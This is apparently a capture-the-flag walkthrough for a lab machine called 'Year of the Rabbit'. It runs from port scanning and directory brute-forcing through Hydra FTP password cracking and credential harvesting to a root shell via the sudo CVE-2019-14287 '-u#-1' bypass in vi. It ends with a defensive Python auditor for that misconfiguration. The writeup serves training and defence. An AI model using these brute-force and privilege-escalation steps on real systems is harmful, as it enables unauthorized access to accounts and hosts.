Using nmap to scan and identify open ports and services
nmap -Pn -sC -sV 10.10.243.87
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-17 20:54 IST
Nmap scan report for 10.10.243.87
Host is up (0.17s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.2
22/tcp open ssh OpenSSH 6.7p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
| 1024 a0:8b:6b:78:09:39:03:32:ea:52:4c:20:3e:82:ad:60 (DSA)
| 2048 df:25:d0:47:1f:37:d9:18:81:87:38:76:30:92:65:1f (RSA)
| 256 be:9f:4f:01:4a:44:c8:ad:f5:03:cb:00:ac:8f:49:44 (ECDSA)
|_ 256 db:b1:c1:b9:cd:8c:9d:60:4f:f1:98:e2:99:fe:08:03 (ED25519)
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Apache2 Debian Default Page: It works
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 60.83 seconds
We find open ports 21, 22, and 80 running FTP, SSH and HTTP servers respectively.
The webpage is a default Apache landing page.
2. Scanning
2.1 Gobuster
Directory brute forcing using gobuster on port 80
gobuster dir -u http://10.10.243.87 -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-small-directories.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.243.87
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/seclists/Discovery/Web-Content/raft-small-directories.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/07/17 20:56:10 Starting gobuster in directory enumeration mode
===============================================================
/assets (Status: 301) [Size: 313] [--> http://10.10.243.87/assets/]
/server-status (Status: 403) [Size: 277]
===============================================================
2022/07/17 21:01:54 Finished
===============================================================
Going over to /assets, we find
Viewing style.css, we get another endpoint /sup3r_s3cr3t_fl4g.php
Going there, it pops up a warning to turn off JavaScript and redirects us to a YouTube 'Rick Roll' video.
Capturing this request in Burp, we get an intermediary path /WExYY2Cv-qU
Going to that path while forwarding the requests one at a time, we get an image Hot_Babe.png
Downloading the image
wget http://10.10.243.87/WExYY2Cv-qU/Hot_Babe.png
--2022-07-17 21:11:13-- http://10.10.243.87/WExYY2Cv-qU/Hot_Babe.png
Connecting to 10.10.243.87:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 475075 (464K) [image/png]
Saving to: ‘Hot_Babe.png’
Hot_Babe.png.1 100%[===========================================>] 463.94K 202KB/s in 2.3s
2022-07-17 21:11:16 (202 KB/s) - ‘Hot_Babe.png’ saved [475075/475075]
Using strings on the image, we get an FTP password list for the user ftpuser
Eh, you've earned this. Username for FTP is ftpuser
One of these is the password:
Mou+56n%QK8sr
1618B0AUshw1M
A56IpIl%1s02u
vTFbDzX9&Nmu?
FfF~sfu^UQZmT
8FF?iKO27b~V0
ua4W~2-@y7dE$
===========================================================
Saving these to pass.txt
2.2 Hydra
Using hydra to brute-force the FTP password
hydra -l ftpuser -P pass.txt ftp://10.10.243.87
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-07-17 21:15:04
[DATA] max 16 tasks per 1 server, overall 16 tasks, 82 login tries (l:1/p:82), ~6 tries per task
[DATA] attacking ftp://10.10.243.87:21/
[21][ftp] host: 10.10.243.87 login: ftpuser password: 5iez1wGXKfPKQ
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-07-17 21:15:19
We get the credentials
ftpuser : 5iez1wGXKfPKQ
Logging in via FTP, we get a text file Eli's_Creds.txt
ftp 10.10.243.87
Connected to 10.10.243.87.
220 (vsFTPd 3.0.2)
Name (10.10.243.87:joseph): ftpuser
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 758 Jan 23 2020 Eli's_Creds.txt
226 Directory send OK.
ftp> get Eli's_Creds.txt
local: Eli's_Creds.txt remote: Eli's_Creds.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for Eli's_Creds.txt (758 bytes).
226 Transfer complete.
758 bytes received in 0.00 secs (3.8248 MB/s)
ssh eli@10.10.243.87
The authenticity of host '10.10.243.87 (10.10.243.87)' can't be established.
ECDSA key fingerprint is SHA256:ISBm3muLdVA/w4A1cm7QOQQOCSMRlPdDp/x8CNpbJc8.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.243.87' (ECDSA) to the list of known hosts.
eli@10.10.243.87's password:
1 new message
Message from Root to Gwendoline:
"Gwendoline, I am not happy with you. Check our leet s3cr3t hiding place. I've left you a hidden message there"
END MESSAGE
It talks about a secret hiding place, with the secret spelled in leetspeak.
Searching for s3cr3t, we find a directory /usr/games/s3cr3t
It has a hidden file .th1s_m3ss4ag3_15_f0r_gw3nd0l1n3_0nly!. Reading it:
Your password is awful, Gwendoline.
It should be at least 60 characters long! Not just MniVCQVhQHUNI
Honestly!
Yours sincerely
-Root
We get the credentials
Gwendoline : MniVCQVhQHUNI
Switching user to gwendoline, we find user.txt in her home folder
eli@year-of-the-rabbit:/usr/games/s3cr3t$ su gwendoline
Password:
gwendoline@year-of-the-rabbit:/usr/games/s3cr3t$ cd /home/
gwendoline@year-of-the-rabbit:/home$ ls
eli gwendoline
gwendoline@year-of-the-rabbit:/home$ cd gwendoline/
gwendoline@year-of-the-rabbit:~$ ls
user.txt
4. Privilege Escalation
4.1 CVE-2019-14287
When using sudo -l, we get
gwendoline@year-of-the-rabbit:~$ sudo -l
Matching Defaults entries for gwendoline on year-of-the-rabbit:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User gwendoline may run the following commands on year-of-the-rabbit:
(ALL, !root) NOPASSWD: /usr/bin/vi /home/gwendoline/user.txt
There is a !root specified, which means gwendoline can run /usr/bin/vi as any user except root.
Viewing the sudo version, we find that it is 1.8.10
sudo -V
Sudo version 1.8.10p3
Sudoers policy plugin version 1.8.10p3
Sudoers file grammar version 43
Sudoers I/O plugin version 1.8.10p3
This version is vulnerable to CVE-2019-14287, and it can be exploited to run the permitted command as root by prepending sudo -u#-1 to the path of the command the user is allowed to run, i.e. sudo -u#-1 /usr/bin/vi /home/gwendoline/user.txt. Read more about it
This opens vi as root, and we can spawn a shell by typing :!/bin/sh
Reading the root.txt flag
whoami
root
cd /root
ls
root.txt
cat root.txt
Not your typical encoding. This is in fact a programming language called and you can decode it
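As an added defensive check (not part of the original writeup), the following Python audits sudo -V and sudo -l output for the combination seen on this box: a sudo older than 1.8.28 (the release that fixed CVE-2019-14287) together with an (ALL, !root) runas spec, which is exactly the rule the -u#-1 bypass turns into root. The sample outputs are constructed after the ones shown above; the regular expression for sudo -l rule lines is my own assumption about its output format.

```python
import re

# CVE-2019-14287 was fixed in sudo 1.8.28: older versions let a user whose runas
# spec is "(ALL, !root)" run the listed command as root by passing "-u#-1".
FIXED_VERSION = (1, 8, 28)

# Constructed sample output, modelled on the sudo -V / sudo -l output in the writeup.
SAMPLE_SUDO_V = "Sudo version 1.8.10p3\nSudoers policy plugin version 1.8.10p3\n"
SAMPLE_SUDO_L = """Matching Defaults entries for gwendoline on year-of-the-rabbit:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin
User gwendoline may run the following commands on year-of-the-rabbit:
    (ALL, !root) NOPASSWD: /usr/bin/vi /home/gwendoline/user.txt
    (www-data) /usr/bin/less /var/log/apache2/access.log
"""

# "(runas users[: groups]) TAG: TAG: command" as printed by sudo -l (assumed format)
RULE_RE = re.compile(r"^\s*\(([^)]*)\)\s*((?:[A-Z_]+:\s*)*)(\S.*)$")

def parse_sudo_version(text):
    """Return (major, minor, patch) from the 'Sudo version X.Y.Z' line; the pN suffix is ignored."""
    m = re.search(r"Sudo version (\d+)\.(\d+)\.(\d+)", text)
    if not m:
        raise ValueError("no 'Sudo version' line found")
    return tuple(int(x) for x in m.groups())

def parse_rules(text):
    """Return (runas_users, tags, command) for every command line in sudo -l output."""
    rules = []
    for line in text.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue
        users = m.group(1).split(":")[0]                 # drop an optional ": group" part
        runas = [u.strip() for u in users.split(",")]
        tags = [t.rstrip(":") for t in m.group(2).split()]
        rules.append((runas, tags, m.group(3).strip()))
    return rules

def audit(sudo_v_text, sudo_l_text):
    """List rules that reach root through the -u#-1 bypass on an unpatched sudo."""
    findings = []
    if parse_sudo_version(sudo_v_text) >= FIXED_VERSION:
        return findings                                  # patched: the !root exclusion holds
    for runas, tags, command in parse_rules(sudo_l_text):
        if "ALL" in runas and any(u.startswith("!") for u in runas):
            findings.append({"command": command, "runas": runas,
                             "nopasswd": "NOPASSWD" in tags})
    return findings
```

On the sample above audit() reports the vi rule as root-reachable; the remediation is to upgrade sudo and to name the intended target user explicitly (e.g. (gwendoline) instead of (ALL, !root)), since a negated ALL is not a safe allow-list even on patched versions.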